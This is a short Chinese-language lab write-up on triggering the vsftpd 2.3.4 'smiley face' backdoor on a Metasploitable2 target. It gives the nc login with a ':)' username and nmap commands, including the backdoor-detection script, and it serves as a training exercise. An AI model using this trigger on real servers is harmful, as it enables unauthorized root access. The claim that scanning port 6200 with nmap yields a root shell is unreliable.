张小明
前端开发工程师
一、实验准备:
1、Metaspolitable2(靶机)
2、kali
二、实验步骤:
1、打开kali和靶机,两者都要处于NAT模式
2、在终端使用命令(ip addr)查看kali的ip 然后nmap+kali IP,得到靶机ip
3、执行nmap -sV +(靶机IP)得到端口服务信息
4.手动模拟FTP登录,nc 192.168.61.130 21 回车后输入FTP用户名USER 1:),回车输入密码PASS 123,然后就可以crtl+C退出当前nc连接,注意:用户名一定要带有“:)”这个是触发笑脸漏洞的关键,密码任意都行。
5、nmap 192.168.61.130 -p 6200就可以连接到靶机的后门,拿到root权限。
三、正式的NSE-nmap脚本
针对VSFTPD v2.3.4的检测脚本它的方法为--script加上脚本名即nmap --script ftp-vsftpd-backdoor 192.168.61.130
本文只做分享,不做它用
如何安全刷机:精准定位机顶盒官方固件下载渠道的实战指南你有没有遇到过这样的情况?家里的电视盒子突然卡顿、无法加载IPTV节目,甚至频繁重启。网上一搜,“刷个新固件就好了”成了标准答案。于是你兴致勃勃地下载了一个“最新版固…
李华
Dify平台的艺术流派特征总结准确性验证 在数字人文与智能艺术分析日益融合的今天,一个现实而棘手的问题摆在我们面前:如何让大模型准确理解并总结那些微妙、复杂且充满历史语境的艺术流派特征?比如,“后印象派”和“表现主义”虽…
李华
MusicFree插件系统完整指南:打造个性化音乐播放器的终极教程 【免费下载链接】MusicFreePlugins MusicFree播放插件 项目地址: https://gitcode.com/gh_mirrors/mu/MusicFreePlugins MusicFree插件系统是一个功能强大的开源音乐播放器插件生态,让…
李华
开源阅读鸿蒙版:从零构建专属数字书房 【免费下载链接】legado-Harmony 开源阅读鸿蒙版仓库 项目地址: https://gitcode.com/gh_mirrors/le/legado-Harmony 开源阅读鸿蒙版作为专为鸿蒙生态设计的免费阅读工具,通过模块化架构和深度定制能力&…
李华
网站爬虫管理与SEO反垃圾邮件策略 1. 识别爬虫与防范恶意爬虫 在互联网世界中,存在着各种爬虫,了解哪些爬虫属于哪个搜索引擎至关重要。因为除了正规的搜索引擎爬虫,还有一些垃圾邮件机器人(spambots)和其他恶意爬虫,它们出于不道德的目的来爬取你的网站。 1.1 垃圾邮…
李华
Arthas(阿尔萨斯)是阿里巴巴开源的一款 Java 诊断工具,它可以帮助开发者在 不修改代码、不重启服务 的前提下,对运行中的 Java 应用进行实时诊断、调试、监控和问题排查。 下面我会从你关心的两个层面来讲解 Arthas 提供的机制&am…
李华